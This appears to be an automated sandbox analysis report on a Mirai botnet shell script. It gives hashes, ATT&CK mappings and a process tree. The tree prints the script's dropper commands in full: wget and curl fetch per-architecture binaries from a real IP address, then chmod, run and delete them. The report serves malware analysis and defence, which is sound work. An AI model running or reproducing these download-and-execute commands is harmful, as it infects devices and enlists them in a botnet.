mirai | 48f59527a700f3e75a01be9f0cf94f058e9a28a549864856116300f58cc93e13

Analysis

max time kernel
82s
max time network
151s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
27-12-2024 09:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

real.sh
Size

2KB
MD5

3c80f90e2189bbcb7dfaa459d3a98882
SHA1

f523a037d1cb6f1333e082a4e702b565ddf6f8e7
SHA256

48f59527a700f3e75a01be9f0cf94f058e9a28a549864856116300f58cc93e13
SHA512

7b35ddc719c140ae3807f8514a84eef890b47cde8777d53c9e933d61dade32b8e51683b6ca58f46e6a3c71e1aea04cb8954c16258367e563bef9529cc1352f37

Score

10^/10

mirai botnet defense_evasion discovery

Malware Config

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (126807) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 22 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
748	chmod
822	chmod
913	chmod
721	chmod
856	chmod
872	chmod
882	chmod
887	chmod
891	chmod
896	chmod
732	chmod
757	chmod
807	chmod
743	chmod
753	chmod
774	chmod
791	chmod
837	chmod
877	chmod
903	chmod
908	chmod
738	chmod

Executes dropped EXE 2 IoCs

ioc	pid	Process
/tmp/telnet.x86	722	telnet.x86
/tmp/telnet.x86	839	telnet.x86

Modifies Watchdog functionality 1 TTPs 4 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/misc/watchdog	telnet.mpsl
File opened for modification	/dev/watchdog	telnet.mpsl
File opened for modification	/dev/misc/watchdog	telnet.mpsl
File opened for modification	/dev/watchdog	telnet.mpsl

Reads runtime system information 11 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
760	rm
890	curl
892	telnet.mips
894	rm
756	wget
758	telnet.mips

Writes file to tmp directory 20 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/telnet.mips	curl
File opened for modification	/tmp/telnet.arm	curl
File opened for modification	/tmp/telnet.arm7	curl
File opened for modification	/tmp/telnet.m68k	curl
File opened for modification	/tmp/telnet.x86	curl
File opened for modification	/tmp/telnet.mpsl	curl
File opened for modification	/tmp/telnet.spc	curl
File opened for modification	/tmp/telnet.arm6	wget
File opened for modification	/tmp/telnet.arm6	curl
File opened for modification	/tmp/telnet.ppc	curl
File opened for modification	/tmp/telnet.arm7	wget
File opened for modification	/tmp/telnet.mips	wget
File opened for modification	/tmp/telnet.mpsl	wget
File opened for modification	/tmp/telnet.ppc	wget
File opened for modification	/tmp/telnet.sh4	wget
File opened for modification	/tmp/telnet.x86	wget
File opened for modification	/tmp/telnet.arm	wget
File opened for modification	/tmp/telnet.arm5	wget
File opened for modification	/tmp/telnet.arm5	curl
File opened for modification	/tmp/telnet.sh4	curl

/tmp/real.sh
/tmp/real.sh
1⤵
PID:699
- /usr/bin/wget
  wget http://79.124.60.186/bins/telnet.x86
  2⤵
  - Writes file to tmp directory
  PID:701
- /bin/chmod
  chmod 777 telnet.x86
  2⤵
  - File and Directory Permissions Modification
  PID:721
- /tmp/telnet.x86
  ./telnet.x86 realtek
  2⤵
  - Executes dropped EXE
  PID:722
- /bin/rm
  rm -rf telnet.x86
  2⤵
  PID:725
- /usr/bin/wget
  wget http://79.124.60.186/bins/telnet.arm
  2⤵
  - Writes file to tmp directory
  PID:727
- /bin/chmod
  chmod 777 telnet.arm
  2⤵
  - File and Directory Permissions Modification
  PID:732
- /tmp/telnet.arm
  ./telnet.arm realtek
  2⤵
  PID:733
- /bin/rm
  rm -rf telnet.arm
  2⤵
  PID:735
- /usr/bin/wget
  wget http://79.124.60.186/bins/telnet.arm5
  2⤵
  - Writes file to tmp directory
  PID:737
- /bin/chmod
  chmod 777 telnet.arm5
  2⤵
  - File and Directory Permissions Modification
  PID:738
- /tmp/telnet.arm5
  ./telnet.arm5 realtek
  2⤵
  PID:739
- /bin/rm
  rm -rf telnet.arm5
  2⤵
  PID:741
- /usr/bin/wget
  wget http://79.124.60.186/bins/telnet.arm6
  2⤵
  - Writes file to tmp directory
  PID:742
- /bin/chmod
  chmod 777 telnet.arm6
  2⤵
  - File and Directory Permissions Modification
  PID:743
- /tmp/telnet.arm6
  ./telnet.arm6 realtek
  2⤵
  PID:744
- /bin/rm
  rm -rf telnet.arm6
  2⤵
  PID:746
- /usr/bin/wget
  wget http://79.124.60.186/bins/telnet.arm7
  2⤵
  - Writes file to tmp directory
  PID:747
- /bin/chmod
  chmod 777 telnet.arm7
  2⤵
  - File and Directory Permissions Modification
  PID:748
- /tmp/telnet.arm7
  ./telnet.arm7 realtek
  2⤵
  PID:749
- /bin/rm
  rm -rf telnet.arm7
  2⤵
  PID:751
- /usr/bin/wget
  wget http://79.124.60.186/bins/telnet.m68k
  2⤵
  PID:752
- /bin/chmod
  chmod 777 telnet.m68k
  2⤵
  - File and Directory Permissions Modification
  PID:753
- /tmp/telnet.m68k
  ./telnet.m68k realtek
  2⤵
  PID:754
- /bin/rm
  rm -rf telnet.m68k
  2⤵
  PID:755
- /usr/bin/wget
  wget http://79.124.60.186/bins/telnet.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:756
- /bin/chmod
  chmod 777 telnet.mips
  2⤵
  - File and Directory Permissions Modification
  PID:757
- /tmp/telnet.mips
  ./telnet.mips realtek
  2⤵
  - System Network Configuration Discovery
  PID:758
- /bin/rm
  rm -rf telnet.mips
  2⤵
  - System Network Configuration Discovery
  PID:760
- /usr/bin/wget
  wget http://79.124.60.186/bins/telnet.mpsl
  2⤵
  - Writes file to tmp directory
  PID:762
- /bin/chmod
  chmod 777 telnet.mpsl
  2⤵
  - File and Directory Permissions Modification
  PID:774
- /tmp/telnet.mpsl
  ./telnet.mpsl realtek
  2⤵
  - Modifies Watchdog functionality
  PID:775
- /bin/rm
  rm -rf telnet.mpsl
  2⤵
  PID:778
- /usr/bin/wget
  wget http://79.124.60.186/bins/telnet.ppc
  2⤵
  - Writes file to tmp directory
  PID:782
- /bin/chmod
  chmod 777 telnet.ppc
  2⤵
  - File and Directory Permissions Modification
  PID:791
- /tmp/telnet.ppc
  ./telnet.ppc realtek
  2⤵
  PID:792
- /bin/rm
  rm -rf telnet.ppc
  2⤵
  PID:796
- /usr/bin/wget
  wget http://79.124.60.186/bins/telnet.sh4
  2⤵
  - Writes file to tmp directory
  PID:797
- /bin/chmod
  chmod 777 telnet.sh4
  2⤵
  - File and Directory Permissions Modification
  PID:807
- /tmp/telnet.sh4
  ./telnet.sh4 realtek
  2⤵
  PID:808
- /bin/rm
  rm -rf telnet.sh4
  2⤵
  PID:812
- /usr/bin/wget
  wget http://79.124.60.186/bins/telnet.spc
  2⤵
  PID:814
- /bin/chmod
  chmod 777 telnet.spc
  2⤵
  - File and Directory Permissions Modification
  PID:822
- /tmp/telnet.spc
  ./telnet.spc realtek
  2⤵
  PID:823
- /bin/rm
  rm -rf telnet.spc
  2⤵
  PID:824
- /usr/bin/curl
  curl -O http://79.124.60.186/bins/telnet.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:826
- /bin/chmod
  chmod 777 telnet.x86
  2⤵
  - File and Directory Permissions Modification
  PID:837
- /tmp/telnet.x86
  ./telnet.x86 realtek
  2⤵
  - Executes dropped EXE
  PID:839
- /bin/rm
  rm -rf telnet.x86
  2⤵
  PID:842
- /usr/bin/curl
  curl -O http://79.124.60.186/bins/telnet.arm
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:844
- /bin/chmod
  chmod 777 telnet.arm
  2⤵
  - File and Directory Permissions Modification
  PID:856
- /tmp/telnet.arm
  ./telnet.arm realtek
  2⤵
  PID:857
- /bin/rm
  rm -rf telnet.arm
  2⤵
  PID:860
- /usr/bin/curl
  curl -O http://79.124.60.186/bins/telnet.arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:861
- /bin/chmod
  chmod 777 telnet.arm5
  2⤵
  - File and Directory Permissions Modification
  PID:872
- /tmp/telnet.arm5
  ./telnet.arm5 realtek
  2⤵
  PID:873
- /bin/rm
  rm -rf telnet.arm5
  2⤵
  PID:875
- /usr/bin/curl
  curl -O http://79.124.60.186/bins/telnet.arm6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:876
- /bin/chmod
  chmod 777 telnet.arm6
  2⤵
  - File and Directory Permissions Modification
  PID:877
- /tmp/telnet.arm6
  ./telnet.arm6 realtek
  2⤵
  PID:878
- /bin/rm
  rm -rf telnet.arm6
  2⤵
  PID:880
- /usr/bin/curl
  curl -O http://79.124.60.186/bins/telnet.arm7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:881
- /bin/chmod
  chmod 777 telnet.arm7
  2⤵
  - File and Directory Permissions Modification
  PID:882
- /tmp/telnet.arm7
  ./telnet.arm7 realtek
  2⤵
  PID:883
- /bin/rm
  rm -rf telnet.arm7
  2⤵
  PID:885
- /usr/bin/curl
  curl -O http://79.124.60.186/bins/telnet.m68k
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:886
- /bin/chmod
  chmod 777 telnet.m68k
  2⤵
  - File and Directory Permissions Modification
  PID:887
- /tmp/telnet.m68k
  ./telnet.m68k realtek
  2⤵
  PID:888
- /bin/rm
  rm -rf telnet.m68k
  2⤵
  PID:889
- /usr/bin/curl
  curl -O http://79.124.60.186/bins/telnet.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:890
- /bin/chmod
  chmod 777 telnet.mips
  2⤵
  - File and Directory Permissions Modification
  PID:891
- /tmp/telnet.mips
  ./telnet.mips realtek
  2⤵
  - System Network Configuration Discovery
  PID:892
- /bin/rm
  rm -rf telnet.mips
  2⤵
  - System Network Configuration Discovery
  PID:894
- /usr/bin/curl
  curl -O http://79.124.60.186/bins/telnet.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:895
- /bin/chmod
  chmod 777 telnet.mpsl
  2⤵
  - File and Directory Permissions Modification
  PID:896
- /tmp/telnet.mpsl
  ./telnet.mpsl realtek
  2⤵
  - Modifies Watchdog functionality
  PID:897
- /bin/rm
  rm -rf telnet.mpsl
  2⤵
  PID:899
- /usr/bin/curl
  curl -O http://79.124.60.186/bins/telnet.ppc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:902
- /bin/chmod
  chmod 777 telnet.ppc
  2⤵
  - File and Directory Permissions Modification
  PID:903
- /tmp/telnet.ppc
  ./telnet.ppc realtek
  2⤵
  PID:904
- /bin/rm
  rm -rf telnet.ppc
  2⤵
  PID:906
- /usr/bin/curl
  curl -O http://79.124.60.186/bins/telnet.sh4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:907
- /bin/chmod
  chmod 777 telnet.sh4
  2⤵
  - File and Directory Permissions Modification
  PID:908
- /tmp/telnet.sh4
  ./telnet.sh4 realtek
  2⤵
  PID:909
- /bin/rm
  rm -rf telnet.sh4
  2⤵
  PID:911
- /usr/bin/curl
  curl -O http://79.124.60.186/bins/telnet.spc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:912
- /bin/chmod
  chmod 777 telnet.spc
  2⤵
  - File and Directory Permissions Modification
  PID:913
- /tmp/telnet.spc
  ./telnet.spc realtek
  2⤵
  PID:914
- /bin/rm
  rm -rf telnet.spc
  2⤵
  PID:915

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/telnet.x86

Filesize
71KB

MD5
9ced588aec0ba67ad8f01ce3ea50cbfa

SHA1
d5ac11a2ae0c717a79279db0046dd6b34c706895

SHA256
e690a79a215ba4e23fd294dd13ae1065adfbdee259b9b8657e6851fdd912e7e8

SHA512
849f0762220471058e3775e748a510b2f17bec7ecb76bdece52e29b5eb7060aa4596978fcc93602ea19b96cd4f305d7c71823c5a886878deb0096b96d0a26312

Download Submit